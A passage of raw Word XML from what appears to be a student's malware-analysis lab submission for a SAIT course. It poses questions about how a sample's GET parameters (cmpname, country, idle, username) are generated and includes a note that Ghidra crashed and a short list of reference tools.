          <w:bar w:val="nil"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="120"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00916D25">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">How is the value of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00916D25">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>cmpname</w:t>
      </w:r>
      <w:r w:rsidRPr="00916D25">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> GET request parameter being generated?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2697BB" w14:textId="77777777" w:rsidR="00E3721C" w:rsidRPr="00E3721C" w:rsidRDefault="00E3721C" w:rsidP="00E3721C"/>
    <w:p w14:paraId="4597B621" w14:textId="77777777" w:rsidR="00E3721C" w:rsidRDefault="00E3721C" w:rsidP="00E3721C"/>
    <w:p w14:paraId="6832D79E" w14:textId="03EF9259" w:rsidR="00E3721C" w:rsidRPr="009F12FE" w:rsidRDefault="009F12FE" w:rsidP="00E3721C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>My Ghidra is no longer working for some reason? I don’t know why but it crashes whenever I launch it, I am going to try troubleshooting it but for now I am unable to answer these questions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0186BB1E" w14:textId="77777777" w:rsidR="00E3721C" w:rsidRPr="00E3721C" w:rsidRDefault="00E3721C" w:rsidP="00E3721C"/>
    <w:p w14:paraId="28C524E6" w14:textId="77777777" w:rsidR="00E3721C" w:rsidRPr="00E3721C" w:rsidRDefault="00E3721C" w:rsidP="00E3721C"/>
    <w:p w14:paraId="2E254B79" w14:textId="77777777" w:rsidR="00E3721C" w:rsidRPr="00E3721C" w:rsidRDefault="00E3721C" w:rsidP="00E3721C"/>
    <w:p w14:paraId="71A115BE" w14:textId="4D26430D" w:rsidR="005927A0" w:rsidRPr="00916D25" w:rsidRDefault="005927A0" w:rsidP="0018667E">
      <w:pPr>
        <w:pStyle w:val="SAITCaption"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
          <w:bar w:val="nil"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="120"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00916D25">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">How is the value of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00916D25">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>country</w:t>
      </w:r>
      <w:r w:rsidRPr="00916D25">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> GET request parameter being generated?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CD1D9C" w14:textId="77777777" w:rsidR="00E3721C" w:rsidRPr="00E3721C" w:rsidRDefault="00E3721C" w:rsidP="00E3721C"/>
    <w:p w14:paraId="42F5D827" w14:textId="77777777" w:rsidR="00E3721C" w:rsidRDefault="00E3721C" w:rsidP="00E3721C"/>
    <w:p w14:paraId="6C7236AB" w14:textId="77777777" w:rsidR="00E3721C" w:rsidRDefault="00E3721C" w:rsidP="00E3721C"/>
    <w:p w14:paraId="74A82A8A" w14:textId="77777777" w:rsidR="00E3721C" w:rsidRPr="00E3721C" w:rsidRDefault="00E3721C" w:rsidP="00E3721C"/>
    <w:p w14:paraId="7274EA0A" w14:textId="77777777" w:rsidR="00E3721C" w:rsidRPr="00E3721C" w:rsidRDefault="00E3721C" w:rsidP="00E3721C"/>
    <w:p w14:paraId="0A436FDB" w14:textId="77777777" w:rsidR="00E3721C" w:rsidRPr="00E3721C" w:rsidRDefault="00E3721C" w:rsidP="00E3721C"/>
    <w:p w14:paraId="5FEF6088" w14:textId="77777777" w:rsidR="00DC01D0" w:rsidRDefault="00DC01D0">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D955BAF" w14:textId="73F27E76" w:rsidR="005927A0" w:rsidRPr="00916D25" w:rsidRDefault="005927A0" w:rsidP="0018667E">
      <w:pPr>
        <w:pStyle w:val="SAITCaption"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
          <w:bar w:val="nil"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="120"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00916D25">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">How is the value of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00916D25">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>idle</w:t>
      </w:r>
      <w:r w:rsidRPr="00916D25">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> GET request parameter being generated?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5826DF87" w14:textId="77777777" w:rsidR="00E3721C" w:rsidRPr="00E3721C" w:rsidRDefault="00E3721C" w:rsidP="00E3721C"/>
    <w:p w14:paraId="665A1602" w14:textId="77777777" w:rsidR="00E3721C" w:rsidRDefault="00E3721C" w:rsidP="00E3721C"/>
    <w:p w14:paraId="290B2E02" w14:textId="77777777" w:rsidR="00E3721C" w:rsidRDefault="00E3721C" w:rsidP="00E3721C"/>
    <w:p w14:paraId="2CF0D00E" w14:textId="77777777" w:rsidR="00E3721C" w:rsidRPr="00E3721C" w:rsidRDefault="00E3721C" w:rsidP="00E3721C"/>
    <w:p w14:paraId="2D6A6DF2" w14:textId="77777777" w:rsidR="00E3721C" w:rsidRPr="00E3721C" w:rsidRDefault="00E3721C" w:rsidP="00E3721C"/>
    <w:p w14:paraId="6708B3FB" w14:textId="77777777" w:rsidR="00E3721C" w:rsidRPr="00E3721C" w:rsidRDefault="00E3721C" w:rsidP="00E3721C"/>
    <w:p w14:paraId="1EDA0BE1" w14:textId="13835D58" w:rsidR="005927A0" w:rsidRPr="00916D25" w:rsidRDefault="005927A0" w:rsidP="0018667E">
      <w:pPr>
        <w:pStyle w:val="SAITCaption"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
          <w:bar w:val="nil"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="120"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00916D25">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">How is the value of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00916D25">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r w:rsidRPr="00916D25">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> GET request parameter being generated?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53ED8092" w14:textId="77777777" w:rsidR="00E3721C" w:rsidRPr="00E3721C" w:rsidRDefault="00E3721C" w:rsidP="00E3721C">
      <w:bookmarkStart w:id="17" w:name="_Toc472375414"/>
    </w:p>
    <w:p w14:paraId="596A3974" w14:textId="77777777" w:rsidR="00E3721C" w:rsidRDefault="00E3721C" w:rsidP="00E3721C"/>
    <w:p w14:paraId="5B2AFDDE" w14:textId="77777777" w:rsidR="00E3721C" w:rsidRDefault="00E3721C" w:rsidP="00E3721C"/>
    <w:p w14:paraId="1B5A089D" w14:textId="77777777" w:rsidR="00E3721C" w:rsidRPr="00E3721C" w:rsidRDefault="00E3721C" w:rsidP="00E3721C"/>
    <w:p w14:paraId="68093624" w14:textId="77777777" w:rsidR="00E3721C" w:rsidRPr="00E3721C" w:rsidRDefault="00E3721C" w:rsidP="00E3721C"/>
    <w:p w14:paraId="446EEB61" w14:textId="77777777" w:rsidR="00E3721C" w:rsidRPr="00E3721C" w:rsidRDefault="00E3721C" w:rsidP="00E3721C"/>
    <w:p w14:paraId="27EF1F6A" w14:textId="77777777" w:rsidR="00916D25" w:rsidRDefault="00916D25">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc20"/>
      <w:bookmarkStart w:id="19" w:name="_Toc472375415"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA7736C" w14:textId="3B92BCE6" w:rsidR="006316C1" w:rsidRDefault="002A1460" w:rsidP="002A1460">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc24514479"/>
      <w:bookmarkEnd w:id="18"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>References</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="36FE27DB" w14:textId="1F4C50A6" w:rsidR="002A1460" w:rsidRDefault="0079051C" w:rsidP="002A1460">
      <w:r w:rsidRPr="0079051C">
        <w:t>Combs, G. (2016). Wireshark [Computer software]. Retrieved from https://www.wireshark.org/</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4BC6F6" w14:textId="77777777" w:rsidR="002A1460" w:rsidRDefault="002A1460" w:rsidP="006316C1"/>
    <w:p w14:paraId="311E1970" w14:textId="69DD81FD" w:rsidR="006316C1" w:rsidRDefault="0079051C" w:rsidP="006316C1">
      <w:r w:rsidRPr="0079051C">
        <w:t>Hex-Rays. (2016). IDA Pro. [Computer software].Retrieved from https://www.hex-rays.com/products/ida/support/download.shtml.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6177F278" w14:textId="77777777" w:rsidR="006316C1" w:rsidRDefault="006316C1" w:rsidP="00E026F5"/>
    <w:p w14:paraId="0054BB43" w14:textId="6B72E596" w:rsidR="002A1460" w:rsidRDefault="0079051C" w:rsidP="00E026F5">
      <w:r w:rsidRPr="0079051C">
        <w:t>Hungenberg, T. and Eckert, M. (2016) INetSim (Version 1.2.6) [Computer software]. Retrieved from http://www.inetsim.org/</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568FAE7B" w14:textId="77777777" w:rsidR="002A1460" w:rsidRDefault="002A1460" w:rsidP="00E026F5"/>
    <w:p w14:paraId="612595D3" w14:textId="64F8FE0C" w:rsidR="002A1460" w:rsidRDefault="0079051C" w:rsidP="00E026F5">
      <w:r w:rsidRPr="0079051C">
        <w:t>Johnson, A. (2016). Resource Hacker (Version 4.5.30) [Computer software]. Retrieved from http://www.angusj.com/resourcehacker/</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8FD7BE" w14:textId="77777777" w:rsidR="000174C1" w:rsidRDefault="000174C1" w:rsidP="00E026F5"/>
    <w:p w14:paraId="024A57C9" w14:textId="77777777" w:rsidR="00512D26" w:rsidRDefault="00512D26" w:rsidP="00E026F5">
      <w:pPr>
        <w:sectPr w:rsidR="00512D26" w:rsidSect="002C432D">
          <w:headerReference w:type="default" r:id="rId25"/>
          <w:footerReference w:type="default" r:id="rId26"/>
          <w:headerReference w:type="first" r:id="rId27"/>
          <w:footerReference w:type="first" r:id="rId28"/>
          <w:pgSz w:w="12240" w:h="15840" w:code="1"/>
          <w:pgMar w:top="1530" w:right="1440" w:bottom="1530" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
          <w:pgNumType w:start="1"/>
          <w:cols w:space="720"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D177E7F" w14:textId="23AEDED9" w:rsidR="00433B33" w:rsidRPr="001B0A05" w:rsidRDefault="00433B33" w:rsidP="00017FD6"/>
    <w:sectPr w:rsidR="00433B33" w:rsidRPr="001B0A05" w:rsidSect="00512D26">
      <w:headerReference w:type="first" r:id="rId29"/>
      <w:footerReference w:type="first" r:id="rId30"/>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57FB" w14:textId="77777777" w:rsidR="002922E3" w:rsidRDefault="002922E3" w:rsidP="007F2B57">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F0DF39" w14:textId="77777777" w:rsidR="002922E3" w:rsidRDefault="002922E3" w:rsidP="007F2B57"/>
    <w:p w14:paraId="5DB05989" w14:textId="77777777" w:rsidR="002922E3" w:rsidRDefault="002922E3" w:rsidP="007F2B57"/>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="13F4C36A" w14:textId="77777777" w:rsidR="002922E3" w:rsidRDefault="002922E3" w:rsidP="007F2B57">
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF9766D" w14:textId="77777777" w:rsidR="002922E3" w:rsidRDefault="002922E3" w:rsidP="007F2B57"/>
    <w:p w14:paraId="104100ED" w14:textId="77777777" w:rsidR="002922E3" w:rsidRDefault="002922E3"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altName w:val="Arial"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="modern"/>
    <w:notTrueType/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="00000007" w:usb1="00000001" w:usb2="00000000" w:usb3="00000000" w:csb0="00000093" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Liberation Mono">
    <w:altName w:val="Courier New"/>
    <w:charset w:val="01"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Droid Sans">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Titillium Bd">
    <w:altName w:val="Arial"/>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D9F9" w14:textId="0D8264E8" w:rsidR="002E6E3D" w:rsidRPr="0099405D" w:rsidRDefault="002E6E3D" w:rsidP="00CC79F5">
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1170"/>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:before="60" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="1260" w:hanging="630"/>
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri"/>
        <w:b/>
        <w:bCs/>
        <w:color w:val="000000"/>
        <w:kern w:val="32"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="0099405D">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri"/>
        <w:b/>
        <w:bCs/>
        <w:noProof/>
        <w:color w:val="000000"/>
        <w:kern w:val="32"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
        <w:lang w:eastAsia="en-CA"/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2379ABE9" wp14:editId="0DC4DC12">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>657225</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>0</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="0" cy="457200"/>
              <wp:effectExtent l="19050" t="0" r="19050" b="19050"/>
              <wp:wrapNone/>
              <wp:docPr id="10" name="Straight Connector 10"/>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78C2982A" id="Straight Connector 10"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M5UssbkBAABfAwAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0Rv&#10;Yy54bWxQSwECLQAUAAYACAAAACEArjH1OtkAAAAHAQAADwAAAAAAAAAAAAAAAAATBAAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA8wAAABkFAAAAAA==&#10;" strokecolor="#005eb8" strokeweight="2.25pt"/>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
    <w:r w:rsidRPr="0099405D">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri"/>
        <w:b/>
        <w:bCs/>
        <w:noProof/>
        <w:color w:val="000000"/>
        <w:kern w:val="32"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
        <w:lang w:eastAsia="en-CA"/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251668480" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="543B4A85" wp14:editId="01A6C210">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40105672" id="Straight Connecto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99405D">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri"/>
        <w:b/>
        <w:bCs/>
        <w:color w:val="000000"/>
        <w:kern w:val="32"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidRPr="0099405D">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri"/>
        <w:b/>
        <w:bCs/>
        <w:color w:val="000000"/>
        <w:kern w:val="32"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
    </w:r>
    <w:r w:rsidRPr="0099405D">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri"/>
        <w:b/>
        <w:bCs/>
        <w:color w:val="000000"/>
        <w:kern w:val="32"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="001B2745">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri"/>
        <w:b/>
        <w:bCs/>
        <w:noProof/>
        <w:color w:val="000000"/>
        <w:kern w:val="32"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:t>15</w:t>
    </w:r>
    <w:r w:rsidRPr="0099405D">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri"/>
        <w:b/>
        <w:bCs/>
        <w:color w:val="000000"/>
        <w:kern w:val="32"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r w:rsidRPr="0099405D">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri"/>
        <w:b/>
        <w:bCs/>
        <w:color w:val="000000"/>
        <w:kern w:val="32"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:tab/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri"/>
        <w:b/>
        <w:bCs/>
        <w:color w:val="000000"/>
        <w:kern w:val="32"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:t>ICT: Malware Analysis</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="6758E91D" w14:textId="0B834D21" w:rsidR="002E6E3D" w:rsidRPr="0099405D" w:rsidRDefault="002E6E3D" w:rsidP="00CC79F5">
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1170"/>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:before="60" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="both"/>
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri"/>
        <w:color w:val="000000"/>
        <w:kern w:val="32"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="32"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri"/>
        <w:color w:val="000000"/>
        <w:kern w:val="32"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="32"/>
      </w:rPr>
      <w:tab/>
      <w:t>© 2017</w:t>
    </w:r>
    <w:r w:rsidRPr="0099405D">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri"/>
        <w:color w:val="000000"/>
        <w:kern w:val="32"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="32"/>
      </w:rPr>
      <w:t>, Southern Alberta Institute of Technology</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="58F3FE8F" w14:textId="77777777" w:rsidR="002E6E3D" w:rsidRPr="0099405D" w:rsidRDefault="002E6E3D" w:rsidP="0099405D">
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:jc w:val="both"/>
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri"/>
        <w:color w:val="000000"/>
        <w:kern w:val="32"/>
        <w:sz w:val="12"/>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A49F" w14:textId="2D3EA026" w:rsidR="002E6E3D" w:rsidRPr="00E3669A" w:rsidRDefault="002E6E3D" w:rsidP="00E3669A">
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1170"/>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:before="60" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="1260" w:hanging="450"/>
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri"/>
        <w:b/>
        <w:bCs/>
        <w:color w:val="000000"/>
        <w:kern w:val="32"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="00E3669A">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri"/>
        <w:b/>
        <w:bCs/>
        <w:noProof/>
        <w:color w:val="000000"/>
        <w:kern w:val="32"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
        <w:lang w:eastAsia="en-CA"/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251672576" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3EAEED68" wp14:editId="57D696DB">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>657225</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>0</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="0" cy="457200"/>
              <wp:effectExtent l="19050" t="0" r="19050" b="19050"/>
              <wp:wrapNone/>
              <wp:docPr id="8" name="Straight Connector 8"/>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7028576B" id="Straight Connector 8"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" strokecolor="#005eb8" strokeweight="2.25pt"/>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
    <w:r w:rsidRPr="00E3669A">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri"/>
        <w:b/>
        <w:bCs/>
        <w:noProof/>
        <w:color w:val="000000"/>
        <w:kern w:val="32"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
        <w:lang w:eastAsia="en-CA"/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251671552" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5E6634DC" wp14:editId="1206CBF1">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>-9525</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>-12700</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="59436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7BC3CEF9"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jbenVLwBAABeAwAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uy&#10;b0RvYy54bWxQSwECLQAUAAYACAAAACEALdJ+5NkAAAAIAQAADwAAAAAAAAAAAAAAAAAWBAAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAABwFAAAAAA==&#10;" strokecolor="#005eb8" strokeweight="2.25pt"/>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
    <w:r w:rsidRPr="00E3669A">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri"/>
        <w:b/>
        <w:bCs/>
        <w:color w:val="000000"/>
        <w:kern w:val="32"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidRPr="00E3669A">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri"/>
        <w:b/>
        <w:bCs/>
        <w:color w:val="000000"/>
        <w:kern w:val="32"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
    </w:r>
    <w:r w:rsidRPr="00E3669A">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri"/>
        <w:b/>
        <w:bCs/>
        <w:color w:val="000000"/>
        <w:kern w:val="32"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="001B2745">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri"/>
        <w:b/>
        <w:bCs/>
        <w:noProof/>
        <w:color w:val="000000"/>
        <w:kern w:val="32"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r w:rsidRPr="00E3669A">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri"/>
        <w:b/>
        <w:bCs/>
        <w:color w:val="000000"/>
        <w:kern w:val="32"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r w:rsidRPr="00E3669A">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri"/>
        <w:b/>
        <w:bCs/>
        <w:color w:val="000000"/>
        <w:kern w:val="32"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:tab/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri"/>
        <w:b/>
        <w:bCs/>
        <w:color w:val="000000"/>
        <w:kern w:val="32"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:t>ICT: Malware Analysis</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="4C6E4DE3" w14:textId="77777777" w:rsidR="002E6E3D" w:rsidRPr="00E3669A" w:rsidRDefault="002E6E3D" w:rsidP="00E3669A">
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1170"/>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:before="60" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="both"/>
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri"/>
        <w:color w:val="000000"/>
        <w:kern w:val="32"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="32"/>
      </w:rPr>
    </w:pPr>
